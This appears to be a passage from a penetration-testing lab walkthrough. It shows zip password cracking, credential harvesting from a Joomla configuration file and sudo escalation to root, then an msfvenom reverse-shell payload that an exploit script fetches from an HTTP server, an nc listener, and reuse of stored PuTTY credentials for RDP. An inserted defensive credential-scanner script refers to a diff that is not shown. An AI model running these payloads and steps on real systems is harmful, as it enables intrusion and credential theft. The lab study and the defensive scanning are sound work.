Loaded hashes with cost 1 (HMAC size) varying from 28 to 6535
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
codeblue (sitebackup3.zip/joomla/language/.DS_Store)
codeblue (sitebackup3.zip/joomla/includes/app.php)
codeblue (sitebackup3.zip/joomla/web.config.txt)
codeblue (sitebackup3.zip/joomla/cli/joomla.php)
codeblue (sitebackup3.zip/joomla/cli/index.html)
codeblue (sitebackup3.zip/joomla/htaccess.txt)
codeblue (sitebackup3.zip/joomla/LICENSE.txt)
codeblue (sitebackup3.zip/joomla/includes/index.html)
codeblue (sitebackup3.zip/joomla/language/overrides/index.html)
codeblue (sitebackup3.zip/joomla/cache/index.html)
codeblue (sitebackup3.zip/joomla/includes/defines.php)
codeblue (sitebackup3.zip/joomla/README.txt)
codeblue (sitebackup3.zip/joomla/language/index.html)
codeblue (sitebackup3.zip/joomla/.DS_Store)
codeblue (sitebackup3.zip/joomla/includes/framework.php)
codeblue (sitebackup3.zip/joomla/index.php)
codeblue (sitebackup3.zip/joomla/configuration.php)
codeblue (sitebackup3.zip/joomla/robots.txt)
codeblue (sitebackup3.zip/joomla/tmp/index.html)
19g 0:00:00:23 DONE (2025-12-14 10:48) 0.8109g/s 1748p/s 33215c/s 33215C/s holabebe..loserface1
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

Extract with 7z using the cracked password
┌──(kali🎃kali)-[~/oscp_a/144]
└─$ 7z x sitebackup3.zip
7-Zip 25.01 (x64) : Copyright (c) 1999-2025 Igor Pavlov : 2025-08-03
64-bit locale=en_US.UTF-8 Threads:32 OPEN_MAX:1024, ASM
Scanning the drive for archives:
1 file, 25312 bytes (25 KiB)
Extracting archive: sitebackup3.zip
--
Path = sitebackup3.zip
Type = zip
Physical Size = 25312
Enter password (will not be echoed):
Everything is Ok
Folders: 17
Files: 19
Size: 67063
Compressed: 25312

Search the extracted files for passwords
- → configuration.php
┌──(kali🎃kali)-[~/oscp_a/144/joomla]
└─$ grep -r -i 'passw' *
configuration.php: public $password = 'Password@1';

Username/password found in configuration.php
- → chloe / Ee24zIK4cDhJHL4H
┌──(kali🎃kali)-[~/oscp_a/144/joomla]
└─$ cat configuration.php
<?php
class JConfig {
public $offline = false;
public $offline_message = 'This site is down for maintenance.<br>Please check back again soon.';
public $display_offline_message = 1;
public $offline_image = '';
public $sitename = 'Challenge Lab';
public $editor = 'tinymce';
public $captcha = '0';
public $list_limit = 20;
public $access = 1;
public $debug = false;
public $debug_lang = false;
public $debug_lang_const = true;
public $dbtype = 'mysql';
public $host = 'localhost';
public $user = 'joomla';
public $password = 'Password@1';
public $db = 'jooml';
public $dbprefix = 'o83rl_';
public $dbencryption = 0;
public $dbsslverifyservercert = false;
public $dbsslkey = '';
public $dbsslcert = '';
public $dbsslca = '';
public $dbsslcipher = '';
public $force_ssl = 0;
public $live_site = '';
public $secret = 'Ee24zIK4cDhJHL4H';

Switch to the chloe account
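Both of the credential finds above, the `git show` diff whose `-` lines still hold the database password and the Joomla configuration.php with its `$password` and `$secret` values, are cases a repository or backup scanner should surface before an attacker does. The following is an added example, not part of the original writeup: a small scanner that reports such assignments and, inside a diff, marks values deleted from the tree as still recoverable from history; it also matches the plink `-pw` form that appears in the PuTTY sessions later on. Patterns and sample inputs are constructed.

```python
"""Added example, not part of the original writeup: a scanner for cleartext
credentials in source artifacts: `git show` output (a value blanked in a later
commit still sits on the '-' lines of the history) and a Joomla
configuration.php, plus the plink -pw form. Patterns and samples are constructed."""
import re

SECRET_PATTERNS = [
    # PHP property/variable assignment: $password = "..."; public $secret = '...';
    re.compile(r"\$(?P<key>password|passwd|secret|api_key|token)\s*=\s*"
               r"['\"](?P<val>[^'\"]+)['\"]", re.I),
    # plink/PuTTY style inline password switch: -pw 'value'
    re.compile(r"(?P<key>-pw)\s+['\"]?(?P<val>[^'\"\s]+)"),
    # GitHub personal access token embedded in a remote URL
    re.compile(r"(?P<key>ghp)_(?P<val>[A-Za-z0-9]{20,})"),
]


def scan(text):
    """Return [(status, key, value)] for every credential-looking assignment.

    Inside a diff, a '-' line means the value was deleted from the tree but is
    still recoverable from history, so it is reported as 'removed_in_history'
    rather than silently ignored. Empty values are not reported."""
    findings = []
    in_diff = False
    for line in text.splitlines():
        if line.startswith("diff --git"):
            in_diff = True
        status, body = "present", line
        if in_diff and line[:1] in ("+", "-") and not line.startswith(("+++", "---")):
            status = "removed_in_history" if line[0] == "-" else "added"
            body = line[1:]
        for pat in SECRET_PATTERNS:
            for m in pat.finditer(body):
                if m["val"].strip():
                    findings.append((status, m["key"].lower(), m["val"]))
    return findings


# Constructed `git show` output: the later commit blanks the values, but the
# '-' lines of its own diff still carry them.
SAMPLE_GIT_SHOW = """\
commit 0000000000000000000000000000000000000000 (HEAD -> main)
Author: Dev <dev@example.test>

    Security Update

diff --git a/configuration/database.php b/configuration/database.php
--- a/configuration/database.php
+++ b/configuration/database.php
@@ -2,8 +2,9 @@
 class Database{
     private $db_name = "staff";
-    private $username = "app@example.test";
-    private $password = "S3cretSample!";
+    private $username = "";
+    private $password = "";
+// Cleartext creds cannot be added to public repos!
     public $conn;
"""

# Constructed Joomla configuration file and a stored plink command line.
SAMPLE_CONFIG = """\
<?php
class JConfig {
    public $user = 'joomla';
    public $password = 'SamplePass#1';
    public $secret = 'c0nstructedSecretValue';
}
"""
SAMPLE_PLINK = "plink.exe -pw 'SamplePw!' ops@10.0.0.9 'df -h'"


def demo():
    return {name: scan(text) for name, text in
            [("git", SAMPLE_GIT_SHOW), ("config", SAMPLE_CONFIG), ("plink", SAMPLE_PLINK)]}


if __name__ == "__main__":
    for name, hits in demo().items():
        for status, key, value in hits:
            print(f"{name}: {status} {key}={value}")
```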
stuart@oscp:~$ su chloe
Password:
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.
chloe@oscp:/home/stuart$

Check sudo privileges
- All commands allowed
- → switch to root
chloe@oscp:/home/stuart$ sudo -l
[sudo] password for chloe:
Matching Defaults entries for chloe on oscp:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
User chloe may run the following commands on oscp:
(ALL : ALL) ALL
chloe@oscp:/home/stuart$
chloe@oscp:/home/stuart$ sudo su -
root@oscp:~#

proof.txt
root@oscp:~# cat /root/proof.txt
7ca5ec703d5a4a2074b6fe1153db351a

192.168.122.145 - Hermes
Nmap
PORT STATE SERVICE
21/tcp open ftp
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1978/tcp open unisql
3389/tcp open ms-wbt-server
7680/tcp open pando-pub
161/udp open snmp

Initial Access
Search for “1978/tcp open unisql”
Generate a reverse shell binary for the PoC and start a Python HTTP server
┌──(kali🎃kali)-[~/oscp_a/145]
└─$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.219 LPORT=4444 -f exe -o payload.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of exe file: 7680 bytes
Saved as: payload.exe
┌──(kali🎃kali)-[~/oscp_a/145]
└─$ l
49601 payload.exe scan whatweb
┌──(kali🎃kali)-[~/oscp_a/145]
└─$ python -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...

Run the PoC
┌──(kali🎃kali)-[~/oscp_a/145]
└─$ python2 49601 192.168.122.145 192.168.45.219:8000 payload.exe
[+] 3..2..1..
[+] *Super fast hacker typing*
[+] Retrieving payload
[+] Done! Check Your Listener?

Reverse shell connected
┌──(kali🎃kali)-[~/oscp_a/145]
└─$ rlwrap nc -nlvp 4444
listening on [any] 4444 ...
connect to [192.168.45.219] from (UNKNOWN) [192.168.122.145] 50609
Microsoft Windows [Version 10.0.19041.1]
(c) 2019 Microsoft Corporation. All rights reserved.
C:\WINDOWS\system32>

local.txt
PS C:\Users\offsec\Desktop> dir
dir
Directory: C:\Users\offsec\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 12/15/2025 5:07 AM 34 local.txt
PS C:\Users\offsec\Desktop> type local.txt
type local.txt
6a68dc6059ee54a8bee83a5ba5652452

Privilege Escalation
winpeas
- zachary's username/password found in the PuTTY sessions
- zachary / Th3R@tC@tch3r
Putty Sessions
RegKey Name: zachary
RegKey Value: "&('C:\Program Files\PuTTY\plink.exe') -pw 'Th3R@tC@tch3r' zachary@10.51.21.12 'df -h'"
=================================================================================================

RDP login
┌──(kali🎃kali)-[~/oscp_a/145]
└─$ xfreerdp3 /u:'zachary' /p:'Th3R@tC@tch3r' /v:192.168.122.145

proof.txt
C:\Users\Administrator\Desktop>dir
Volume in drive C has no label.
Volume Serial Number is 2879-D413
Directory of C:\Users\Administrator\Desktop
01/05/2023 11:53 PM <DIR> .
01/05/2023 11:53 PM <DIR> ..
12/15/2025 05:07 AM 34 proof.txt
1 File(s) 34 bytes
2 Dir(s) 9,171,681,280 bytes free
C:\Users\Administrator\Desktop>type proof.txt
4c19b5972793ab554db418a0f6639c4a